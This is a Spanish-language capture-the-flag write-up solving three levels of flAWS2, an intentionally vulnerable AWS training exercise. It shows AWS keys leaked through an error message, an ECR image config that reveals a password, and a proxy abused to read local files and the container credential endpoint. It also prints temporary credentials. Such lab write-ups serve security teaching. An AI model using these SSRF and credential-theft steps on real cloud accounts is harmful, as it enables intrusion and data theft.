flAWS2 es un capture de flag para enseñar problemas que son específicos de AWS.
Hay un flaws1 Link -> http://flaws.cloud/
flaws2 Link -> http://level1.flaws2.cloud/
Nivel 1
Podemos ver que debes mandar un pin code. Pero si mandas una letra se genera un error: https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=ric
Error, malformed input
{"PATH":"/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin","LD_LIBRARY_PATH":"/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib","LANG":"en_US.UTF-8","TZ":":UTC","LAMBDA_TASK_ROOT":"/var/task","LAMBDA_RUNTIME_DIR":"/var/runtime","AWS_REGION":"us-east-1","AWS_DEFAULT_REGION":"us-east-1","AWS_LAMBDA_LOG_GROUP_NAME":"/aws/lambda/level1","AWS_LAMBDA_LOG_STREAM_NAME":"2020/08/24/[$LATEST]f39bf3e6c113465bb71c43a071f38cc2","AWS_LAMBDA_FUNCTION_NAME":"level1","AWS_LAMBDA_FUNCTION_MEMORY_SIZE":"128","AWS_LAMBDA_FUNCTION_VERSION":"$LATEST","_AWS_XRAY_DAEMON_ADDRESS":"169.254.79.2","_AWS_XRAY_DAEMON_PORT":"2000","AWS_XRAY_DAEMON_ADDRESS":"169.254.79.2:2000","AWS_XRAY_CONTEXT_MISSING":"LOG_ERROR","_X_AMZN_TRACE_ID":"Root=1-5f439812-cca2f5da7bd5dd16fde308b4;Parent=454d243e41d0ec9a;Sampled=0","AWS_EXECUTION_ENV":"AWS_Lambda_nodejs8.10","_HANDLER":"index.handler","NODE_PATH":"/opt/nodejs/node8/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task:/var/runtime/node_modules","AWS_ACCESS_KEY_ID":"ASIAZQNB3KHGIZTRFUZB","AWS_SECRET_ACCESS_KEY":"KQA7UGPrHdiqN20vNhuesyXKZnSIkx4SUnw2MfAg","AWS_SESSION_TOKEN":"IQoJb3JpZ2luX2VjELv//////////wEaCXVzLWVhc3QtMSJHMEUCIQDZhaV4c+R2wzVzGlWM/npQuThzb0lLp6jB5ClDHWvnsgIgESIJ6pdq1R9fQDh/5t/ag415bU/mjan47TaN580yFd0qzgEIpP//////////ARABGgw2NTM3MTEzMzE3ODgiDI1Udwf51bgmuFJjNCqiASMsluvqWGeJHMvPrc2QsD7MeaQ0Z61pw9fxjLIe6MH4FcjU8Y2p487Ka6F0GwH/IO8fYNTG7zxa0BPcXFhk5X+0tXXqvP1cdgC1+StyLlW8K7THR2ruvgnG1N/0J66bdraHf5N7JmkfEiYZedxoSI2J87g2U0DsnaY1P0UHxTKLbxIy+xmNsEfpWo3BggTx24SoNZjLbbdq+xivDzGoUGcmTzCSsI76BTrgASoBAHiC2afJGYs/2f0oXhB1Vd9udhKdljk+ic1MwqCH+86cCAV0i80AMRdvaNpVonA11buacN52GfiCr8HQxFrDIh7S1KlvbgiAMc819SAXLsJfzmMGkRp9Xc62W490OZVjT4bovQcATQ8HwD9QozlibmuFnD0WxDh5FcvPVrsm6O1qltqDivQMIEVHpbK7908jXs8/1DLLVOhC41ufQZLd7qm2p5WHxSXhKwJ+pX12bWFLPAupS0l/bx9dpnC2PLvFWy8Dln2UTs4Fr+Db+fNz2YQQQ+OSBiIBSQ/XFWyt"}
Ese error contiene las credenciales para alguien, revisemos:
kali% aws --profile f2l1 sts get-caller-identity
{
"UserId": "AROAIBATWWYQXZTTALNCE:level1",
"Account": "653711331788",
"Arn": "arn:aws:sts::653711331788:assumed-role/level1/level1"
}
kali% aws s3 ls s3://level1.flaws2.cloud --profile f2l1
PRE img/
2018-11-20 15:55:05 17102 favicon.ico
2018-11-20 21:00:22 1905 hint1.htm
2018-11-20 21:00:22 2226 hint2.htm
2018-11-20 21:00:22 2536 hint3.htm
2018-11-20 21:00:23 2460 hint4.htm
2018-11-20 21:00:17 3000 index.htm
2018-11-20 21:00:17 1899 secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html
kali%
Usamos esa información para ir al nivel 2
Nivel 2
Este nivel tiene un container en http://container.target.flaws2.cloud/
kali% aws --profile f2l1 sts get-caller-identity
{
"UserId": "AROAIBATWWYQXZTTALNCE:level1",
"Account": "653711331788",
"Arn": "arn:aws:sts::653711331788:assumed-role/level1/level1"
}
kali% aws ecr list-images --repository-name level2 --registry-id 653711331788 --profile f2l1 --region us-east-1
{
"imageIds": [
{
"imageDigest": "sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e",
"imageTag": "latest"
}
]
}
kali% aws --profile f2l1 --region us-east-1 ecr batch-get-image --repository-name level2 --registry-id 653711331788 --image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
{
"schemaVersion": 2,
"mediaType": "application/vnd.docker.distribution.manifest.v2+json",
"config": {
"mediaType": "application/vnd.docker.container.image.v1+json",
"size": 5359,
"digest": "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621"
},
"layers": [
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 43412182,
"digest": "sha256:7b8b6451c85f072fd0d7961c97be3fe6e2f772657d471254f6d52ad9f158a580"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 848,
"digest": "sha256:ab4d1096d9ba178819a3f71f17add95285b393e96d08c8a6bfc3446355bcdc49"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 619,
"digest": "sha256:e6797d1788acd741d33f4530106586ffee568be513d47e6e20a4c9bc3858822e"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 168,
"digest": "sha256:e25c5c290bded5267364aa9f59a18dd22a8b776d7658a41ffabbf691d8104e36"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 32516034,
"digest": "sha256:96af0e137711cf1b2bf6e95528fbf861b2beef58c382bdadcf8062851e7005bb"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 217,
"digest": "sha256:2057ef5841b5bc57c66088d7d99898e6b7a516feaf2e66a7a4c69e6b40a03472"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 619,
"digest": "sha256:e4206c7b02ec71b1262ad18216e1203da19e5292fcf636392e0ed969871bb235"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 893,
"digest": "sha256:501f2d39ea313392ab1e2b4b6b7d9213c60335d3c508fc02b3bdae9792ae2d32"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 508,
"digest": "sha256:f90fb73d877d9ce2e2220a1340d2e347b0c7baa2d120ce02c8731d666cdb1cac"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 213,
"digest": "sha256:4fbdfdaee9ae20c6e877bd57838c6f93336573195f4aafcdec36fb4c4358a935"
}
]
}
Bajemos el config file
ali% ~ aws --profile f2l1 --region us-east-1 ecr get-download-url-for-layer --repository-name level2 --registry-id 653711331788 --layer-digest "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621"
zsh: correct 'aws' to '.aws' [nyae]? n
zsh: permission denied: /home/kali
kali% aws --profile f2l1 --region us-east-1 ecr get-download-url-for-layer --repository-name level2 --registry-id 653711331788 --layer-digest "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621"
{
"downloadUrl": "https://prod-us-east-1-starport-layer-bucket.s3.us-east-1.amazonaws.com/c814-653711331788-58b3a0a8-1806-5777-1315-c2d788e36c12/1e964f10-a061-4e7b-9290-4447e821fe9a?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEL3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIEmHzGThulZsW3EE5SbDMU2GRLyUBec%2FqiKBUIMSqR%2B5AiA1Y3Tif4xtBiUOns8s%2BVE0I2TCd5eXzvAUkc6uNybU9CreAgil%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAEaDDU5MTEwNTkxNDk1MiIMbRnuFEtYLe%2B7BdOiKrIC3PTaZrMRSm9lktOhlNeDN0VRKBH2BvUBjy0ISvHmmYpYgP1qLWbHVEMzjtO2srjylTekfq86DLT%2Bl%2FZgLzdBBI7D56VJiCQ9%2FreXuzHp%2BvkSQCrk2ia2lgpKUZNEc6QDkdHkSvlQ8rnLbM5PjHFAvzI2Gygzl8guuaRAzVfZzUSUAAMr4vrO0JN637nGMlHi6mkW4yaSBtQyYnJuu1lPm6mcoE1ayzB6%2Fdkj5S9vedet4kt6gMMxbEJC8yXI14GquvmFC2QUZaJKgq6fMzBsfpERtjqmQFQffJPSetLOA53xW2Q%2Fn14UKTfP3u%2FrNynsriw8QBzeMnLJ7Fv9y6H2%2BzF01EPE9i1ql5qkjX6v0UrdsTtwxs1cpx4nSpfyTGuB5iw59VpONrRXx%2B6hhgWtxWkyMKDgjvoFOugBtIJjeUzRSGq1lveztZ5gImtoWg%2B4%2BAqxLnGFE1O3tkfTlOXlw4vSZe4GBbXiY0jUMLpfTYX1wjZZIKXvVuDCpC7XQVIKqHCd5FjN4P6XGYy4cHE3tdDdtNJFDui18t%2Byz3M8JcJKH3iMraWiGR9hBR%2FPaLyvqvpGrC%2FJ%2Be3VOYjIxRl0nWauJlG%2BqnDrg5ydl5zBD7yoQXBYjObJdOYjeal1wqAIEiVZ0ppY%2FWp9tgRhG325py22qYwVxIMbaQPZPICreD4q%2BK3i5ezGAUXQuqnA8%2FjjwFLi6kdsfVzW%2FpIwaj3W3E1n%2BA%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20200824T123523Z&X-Amz-SignedHeaders=host&X-Amz-Expires=3600&X-Amz-Credential=ASIAYTIFIPBEHRNST7OT%2F20200824%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=0007e150616c90b28e4ff9bd8f04fd90d11537889900cdfc3dbc120b3c4db13d",
"layerDigest": "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621"
}
kali% wget https://prod-us-east-1-starport-layer-bucket.s3.us-east-1.amazonaws.com/c814-653711331788-58b3a0a8-1806-57....
El config file tiene una linea:
:"/bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd flaws2 secret_password"}
Lo que nos da el accesso al próximo nivel.
Nivel 3
Es un proxy como el de flaws1 pero esta bloqueado pero podemos ver archivos locales como http://container.target.flaws2.cloud/proxy/file:///proc/self/environ:
HOSTNAME=ip-172-31-56-11.ec2.internalHOME=/rootAWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/9c3439c4-b560-4aac-aa62-f904a24a34e6AWS_EXECUTION_ENV=AWS_ECS_FARGATEAWS_DEFAULT_REGION=us-east-1ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/c88043c3-94ac-4650-a13f-1c15293a5a31PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binAWS_REGION=us-east-1PWD=/
Que nos dice donde estan las credentials http://container.target.flaws2.cloud/proxy/http://169.254.170.2/v2/credentials/9c3439c4-b560-4aac-aa62-f904a24a34e6
{"RoleArn":"arn:aws:iam::653711331788:role/level3","AccessKeyId":"ASIAZQNB3KHGFFPXQZUH","SecretAccessKey":"SstHcaG4DLq0Oy60dHeidpapo6/ZF1L6H+DOeKVd","Token":"IQoJb3JpZ2luX2VjEL3//////////wEaCXVzLWVhc3QtMSJIMEYCIQCVZrZywlb5nQbtFZVFegCM+LYuikSbzzZx17Meo7mmmQIhALAFDkrrcLd8lcZWZy+t3z0u1j0kDqTPW/9HESoYRQMGKvIDCKb//////////wEQARoMNjUzNzExMzMxNzg4Igzcp8wmQFMUEnXiQ3YqxgM76PNI34wpZpr6UOnj6DvebbeWJl6STCM4isqqXBG/Zt6vS9oXIyAcfaxw71b5Tg9NXWbAKwUyfZpRDmDOa6ELa7Groyxjtllxt7B8BfVzREk1s/PnrCa/vGm3R1X98Xr73yyay0a9pI16BypiWoYCcInCPh+ZjCsZtv1G0hCjXPv3sit91o+gdVM22GUsDiGfkmNFepbJUnNuUI5RWpqMvDBZadwVlwSwtd0Q6mQgJFYS8KcHoxRCNOxRTCSbwxHpDdj6qvExNKdcBZiYukzAvsrQHas+uYzQHLd48EA99KsZx+3SVlnq+1yIxqt4ozG0WGt1yAuF7uHaqh1lXoJ98BJA9R5g5GK6DR/0+a5xvaMzhkexVhCFiC2Zo6uvnaLJRHOz136bs7jAITHdCgqhY890sfBDoKFB2owi0JtlQjTuF66ZOufwCUQYbBcwr7NmBFJgcISMBFA3wwO+7weqmeWB/3oktlj6xB8gOTnsazRUUWK6G+g00FpbnnwSNQsOuE+DxRY5DsCk+u4c8x8VgTiM3ZSsEzc2v1/BTvaqdY5SvUmUPvXCmcs47kzJ+duNk+ezvyGHJNtaPT...","Expiration":"2020-08-24T18:31:37Z"}
A partir de ahí podemos entrar al s3
aws --profile f2l3 --region us-east-1 s3 ls 2018-11-20 19:50:08 flaws2.cloud 2018-11-20 18:45:26 level1.flaws2.cloud 2018-11-21 01:41:16 level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud 2018-11-26 19:47:22 level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud 2018-11-27 20:37:27 the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud
Y fin 🙂
